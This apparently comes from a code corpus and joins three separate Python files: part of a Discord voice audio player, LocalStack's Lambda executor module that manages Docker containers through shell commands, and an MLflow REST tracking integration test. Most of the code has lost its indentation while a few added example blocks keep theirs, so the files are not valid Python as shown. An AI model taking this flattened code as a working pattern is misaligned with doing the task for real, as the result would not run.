_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + "probe" if executable in ("ffmpeg", "avconv") else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = utils._from_json(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
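# Illustrative sketch (not part of the library): wrapping a PCM source so its
# volume can be adjusted during playback. Assumes ``voice_client`` is connected
# and the file exists; Opus-encoded sources cannot be wrapped, per the class above.
def _example_play_with_volume(voice_client: VoiceClient, path: str = "music.mp3") -> None:
    source = PCMVolumeTransformer(FFmpegPCMAudio(path), volume=0.5)
    voice_client.play(source)
    source.volume = 0.25  # can be changed at any time while playing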
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
lambda_executors.py
|
import os
import re
import json
import time
import logging
import threading
import subprocess
# from datetime import datetime
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
# for Python 2.7
from pipes import quote as cmd_quote
from localstack import config
from localstack.utils.common import run, TMP_FILES, short_uid, save_file, to_str, cp_r
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_EVENT_FILE = 'event_file.json'
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME = 600
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the execute method """
def __init__(self):
pass
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, env_vars={}, asynchronous=False):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE, env_vars=env_vars)
if asynchronous:
result = '{"asynchronous": "%s"}' % asynchronous
log_output = 'Lambda executed asynchronously'
else:
return_code = process.wait()
result = to_str(process.stdout.read())
log_output = to_str(process.stderr.read())
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Output:\n%s' %
(return_code, log_output))
return result, log_output
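# Illustrative sketch (not part of LocalStack): a minimal LambdaExecutor subclass
# showing the execute() contract implemented by the executors below. It simply
# echoes the invocation event back instead of running any function code.
class EchoLambdaExecutor(LambdaExecutor):
    """ Example executor that returns the invocation event as the result """
    def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
        result = json.dumps(event or {})
        log_output = 'Echoed event for %s' % func_arn
        return result, log_output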
# holds information about an existing container.
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(event)
event_body_escaped = event_body.replace("'", "\\'")
docker_host = config.DOCKER_HOST_FROM_CONTAINER
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body_escaped
environment['HOSTNAME'] = docker_host
environment['LOCALSTACK_HOSTNAME'] = docker_host
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
# custom command to execute in the container
command = ''
# if running a Java Lambda, set up classpath arguments
if runtime == LAMBDA_RUNTIME_JAVA8:
# copy executor jar into temp directory
cp_r(LAMBDA_EXECUTOR_JAR, lambda_cwd)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
command = ("bash -c 'cd %s; java -cp .:`ls *.jar | tr \"\\n\" \":\"` \"%s\" \"%s\" \"%s\"'" %
(taskdir, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.debug('Running lambda cmd: %s' % cmd)
result, log_output = self.run_lambda_executor(cmd, environment, asynchronous)
LOG.debug('Lambda result / log output:\n%s\n>%s' % (result.strip(), log_output.strip().replace('\n', '\n> ')))
return result, log_output
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# set the invocation time
self.function_invoke_times[func_arn] = time.time()
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
if not has_been_invoked_before:
# if this is the first invocation: copy the entire folder into the container
copy_command = 'docker cp "%s/." "%s:/var/task"; ' % (lambda_cwd, container_info.name)
elif os.path.exists(event_file):
# otherwise, copy only the event file if it exists
copy_command = 'docker cp "%s" "%s:/var/task"; ' % (event_file, container_info.name)
cmd = (
'%s' # copy files command
'docker exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, exec_env_vars, container_info.name, command)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lambda runtime environment, e.g. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
LOG.debug('Priming docker container: %s' % container_name)
status = self.get_docker_container_status(func_arn)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'docker create'
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' lambci/lambda:%s'
) % (container_name, env_vars_str, runtime)
LOG.debug(cmd)
run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'docker cp'
' "%s/." "%s:/var/task"'
) % (lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
LOG.debug('Starting container: %s' % container_name)
cmd = 'docker start %s' % (container_name)
LOG.debug(cmd)
run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: lambci/lambda:%s' % runtime)
cmd = (
'docker image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' lambci/lambda:%s'
) % (runtime)
LOG.debug(cmd)
run_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
entry_point = run_result.strip('[]\n\r ')
LOG.debug('Using entrypoint "%s" for container "%s".' % (entry_point, container_name))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'docker stop -t0 %s'
) % (container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'docker rm %s'
) % (container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A list of localstack docker container names, one per function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda container names.')
cmd = 'docker ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"'
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = 'docker rm -f %s' % container_name
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 if the container is running,
-1 if the container exists but is not running,
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name.
container_name = self.get_container_name(func_arn)
# Check if the container is already running.
LOG.debug('Getting container status: %s' % container_name)
cmd = (
'docker ps'
' -a'
' --filter name="%s"'
' --format "{{ .Status }}"'
) % (container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
# An empty status string means the container does not exist.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
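# Illustrative note (not part of the original code): 'docker ps -a --format "{{ .Status }}"'
# prints strings such as 'Up 2 minutes' for a running container or 'Exited (0) 5 seconds ago'
# for a stopped one; these map to the return values 1 and -1 above, while an empty result
# (no matching container) maps to 0.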
def idle_container_destroyer(self):
"""
Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = time.time()
for func_arn, last_run_time in self.function_invoke_times.items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating 60-second timer that re-invokes this method, thereby periodically
checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker-compatible container name for the ARN.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
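# Illustrative sketch (not part of the original code), showing the sanitization that
# get_container_name() applies; the ARN below is made up for the example:
#
#   re.sub(r'[^a-zA-Z0-9_.-]', '_', 'arn:aws:lambda:us-east-1:000000000000:function:f1')
#   # -> 'arn_aws_lambda_us-east-1_000000000000_function_f1'
#
# The method then prefixes the result with 'localstack_lambda_'.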
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(docker create'
' %s'
' %s'
' "lambci/lambda:%s" %s'
')";'
'docker cp "%s/." "$CONTAINER_ID:/var/task";'
'docker start -a "$CONTAINER_ID";'
) % (entrypoint, env_vars_string, runtime, command, lambda_cwd)
else:
lambda_cwd_on_host = self.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'docker run'
'%s -v "%s":/var/task'
' %s'
' --rm'
' "lambci/lambda:%s" %s'
) % (entrypoint, lambda_cwd_on_host, env_vars_string, runtime, command)
return cmd
def get_host_path_for_path_in_docker(self, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
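# Illustrative sketch (not part of the original code): assuming config.TMP_FOLDER is
# '/tmp/localstack' and config.HOST_TMP_FOLDER is '/home/user/.localstack' (both values
# are made up here), get_host_path_for_path_in_docker() would rewrite
# '/tmp/localstack/lambda_abc123' to '/home/user/.localstack/lambda_abc123', while paths
# outside of TMP_FOLDER are returned unchanged.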
class LambdaExecutorLocal(LambdaExecutor):
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
process.start()
result = queue.get()
# TODO capture log output during local execution?
log_output = ''
return result, log_output
def execute_java_lambda(self, event, context, handler, main_file):
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s' % (LAMBDA_EXECUTOR_JAR, main_file)
cmd = 'java -cp %s %s %s %s' % (classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
asynchronous = False
# flip asynchronous flag depending on origin
if 'Records' in event:
# TODO: add more event types that support asynchronous lambda execution
if 'Sns' in event['Records'][0]:
asynchronous = True
if 'dynamodb' in event['Records'][0]:
asynchronous = True
result, log_output = self.run_lambda_executor(cmd, asynchronous=asynchronous)
LOG.debug('Lambda result / log output:\n%s\n> %s' % (result.strip(), log_output.strip().replace('\n', '\n> ')))
return result, log_output
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_LOCAL
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
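# Minimal usage sketch (not part of the original module): one way client code could
# resolve an executor from the LAMBDA_EXECUTOR config value, falling back to the default
# executor for unknown values. The actual selection logic used elsewhere in LocalStack
# may differ from this illustration.
def _example_resolve_executor(name):
    return AVAILABLE_EXECUTORS.get(name, DEFAULT_EXECUTOR)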
|
test_rest_tracking.py
|
"""
Integration test which starts a local Tracking Server on an ephemeral port,
and ensures we can use the tracking API to communicate with it.
"""
import mock
from multiprocessing import Process
import os
import pytest
import socket
import time
import tempfile
from click.testing import CliRunner
import mlflow.experiments
from mlflow.entities import RunStatus
from mlflow.protos.service_pb2 import LOCAL as SOURCE_TYPE_LOCAL
from mlflow.server import app, FILE_STORE_ENV_VAR
from mlflow.tracking import MlflowClient
from mlflow.utils.mlflow_tags import MLFLOW_RUN_NAME, MLFLOW_PARENT_RUN_ID
LOCALHOST = '127.0.0.1'
SERVER_PORT = 0
def _get_safe_port():
"""Returns an ephemeral port that is very likely to be free to bind to."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCALHOST, 0))
port = sock.getsockname()[1]
sock.close()
return port
def _await_server_up_or_die(port, timeout=60):
"""Waits until the local flask server is listening on the given port."""
print('Awaiting server to be up on %s:%s' % (LOCALHOST, port))
start_time = time.time()
connected = False
while not connected and time.time() - start_time < timeout:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((LOCALHOST, port))
if result == 0:
connected = True
else:
print('Server not yet up, waiting...')
time.sleep(0.5)
if not connected:
raise Exception('Failed to connect on %s:%s after %s seconds' % (LOCALHOST, port, timeout))
print('Server is up on %s:%s!' % (LOCALHOST, port))
# NB: We explicitly wait and timeout on server shutdown in order to ensure that pytest output
# reveals the cause in the event of a test hang due to the subprocess not exiting.
def _await_server_down_or_die(process, timeout=60):
"""Waits until the local flask server process is terminated."""
print('Awaiting termination of server process...')
start_time = time.time()
while process.is_alive() and time.time() - start_time < timeout:
time.sleep(0.5)
if process.is_alive():
raise Exception('Server failed to shutdown after %s seconds' % timeout)
@pytest.fixture(scope="module", autouse=True)
def init_and_tear_down_server(request):
"""
Once per run of the entire set of tests, we create a new server, and
clean it up at the end.
"""
global SERVER_PORT
SERVER_PORT = _get_safe_port()
file_store_path = tempfile.mkdtemp("test_rest_tracking_file_store")
env = {FILE_STORE_ENV_VAR: file_store_path}
with mock.patch.dict(os.environ, env):
process = Process(target=lambda: app.run(LOCALHOST, SERVER_PORT))
process.start()
_await_server_up_or_die(SERVER_PORT)
# Yielding here causes pytest to resume execution at the end of all tests.
yield
print("Terminating server...")
process.terminate()
_await_server_down_or_die(process)
@pytest.fixture()
def tracking_server_uri():
"""Provides a tracking URI for communicating with the local tracking server."""
return "http://{hostname}:{port}".format(hostname=LOCALHOST, port=SERVER_PORT)
@pytest.fixture()
def mlflow_client(tracking_server_uri):
"""Provides an MLflow Tracking API client pointed at the local tracking server."""
return MlflowClient(tracking_server_uri)
@pytest.fixture()
def cli_env(tracking_server_uri):
"""Provides an environment for the MLflow CLI pointed at the local tracking server."""
cli_env = {
"LC_ALL": "en_US.UTF-8",
"LANG": "en_US.UTF-8",
"MLFLOW_TRACKING_URI": tracking_server_uri,
}
return cli_env
def test_create_get_list_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('My Experiment',
artifact_location='my_location')
exp = mlflow_client.get_experiment(experiment_id)
assert exp.name == 'My Experiment'
assert exp.artifact_location == 'my_location'
experiments = mlflow_client.list_experiments()
assert set([e.name for e in experiments]) == {'My Experiment'}
def test_delete_restore_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('Deleterious')
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
mlflow_client.delete_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
mlflow_client.restore_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_delete_restore_experiment_cli(mlflow_client, cli_env):
experiment_name = "DeleteriousCLI"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['delete', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['restore', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_rename_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('BadName')
assert mlflow_client.get_experiment(experiment_id).name == 'BadName'
mlflow_client.rename_experiment(experiment_id, 'GoodName')
assert mlflow_client.get_experiment(experiment_id).name == 'GoodName'
def test_rename_experiment_cli(mlflow_client, cli_env):
bad_experiment_name = "BadName"
good_experiment_name = "GoodName"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', bad_experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(bad_experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).name == bad_experiment_name
CliRunner(env=cli_env).invoke(
mlflow.experiments.commands,
['rename', str(experiment_id), good_experiment_name])
assert mlflow_client.get_experiment(experiment_id).name == good_experiment_name
def test_create_run_all_args(mlflow_client):
create_run_kwargs = {
"user_id": "123",
"run_name": "My name",
"source_type": "LOCAL",
"source_name": "Hello",
"entry_point_name": "entry",
"start_time": 456,
"source_version": "abc",
"tags": {
"my": "tag",
"other": "tag",
},
"parent_run_id": "7",
}
experiment_id = mlflow_client.create_experiment('Run A Lot')
created_run = mlflow_client.create_run(experiment_id, **create_run_kwargs)
run_id = created_run.info.run_uuid
print("Run id=%s" % run_id)
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id == create_run_kwargs["user_id"]
assert run.info.source_type == SOURCE_TYPE_LOCAL
assert run.info.source_name == create_run_kwargs["source_name"]
assert run.info.entry_point_name == create_run_kwargs["entry_point_name"]
assert run.info.start_time == create_run_kwargs["start_time"]
assert run.info.source_version == create_run_kwargs["source_version"]
actual_tags = {t.key: t.value for t in run.data.tags}
for tag in create_run_kwargs["tags"]:
assert tag in actual_tags
assert actual_tags.get(MLFLOW_RUN_NAME) == create_run_kwargs["run_name"]
assert actual_tags.get(MLFLOW_PARENT_RUN_ID) == create_run_kwargs["parent_run_id"]
assert mlflow_client.list_run_infos(experiment_id) == [run.info]
def test_create_run_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Run A Little')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id is not None # we should pick some default
def test_log_metrics_params_tags(mlflow_client):
experiment_id = mlflow_client.create_experiment('Oh My')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
mlflow_client.log_metric(run_id, 'metric', 123.456)
mlflow_client.log_param(run_id, 'param', 'value')
mlflow_client.set_tag(run_id, 'taggity', 'do-dah')
run = mlflow_client.get_run(run_id)
metrics = {t.key: t.value for t in run.data.metrics}
params = {t.key: t.value for t in run.data.params}
tags = {t.key: t.value for t in run.data.tags}
assert metrics.get('metric') == 123.456
assert params.get('param') == 'value'
assert tags.get('taggity') == 'do-dah'
def test_set_terminated_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 1')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id)
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FINISHED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_set_terminated_status(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 2')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id, 'FAILED')
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FAILED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_artifacts(mlflow_client):
experiment_id = mlflow_client.create_experiment('Art In Fact')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
src_dir = tempfile.mkdtemp('test_artifacts_src')
src_file = os.path.join(src_dir, 'my.file')
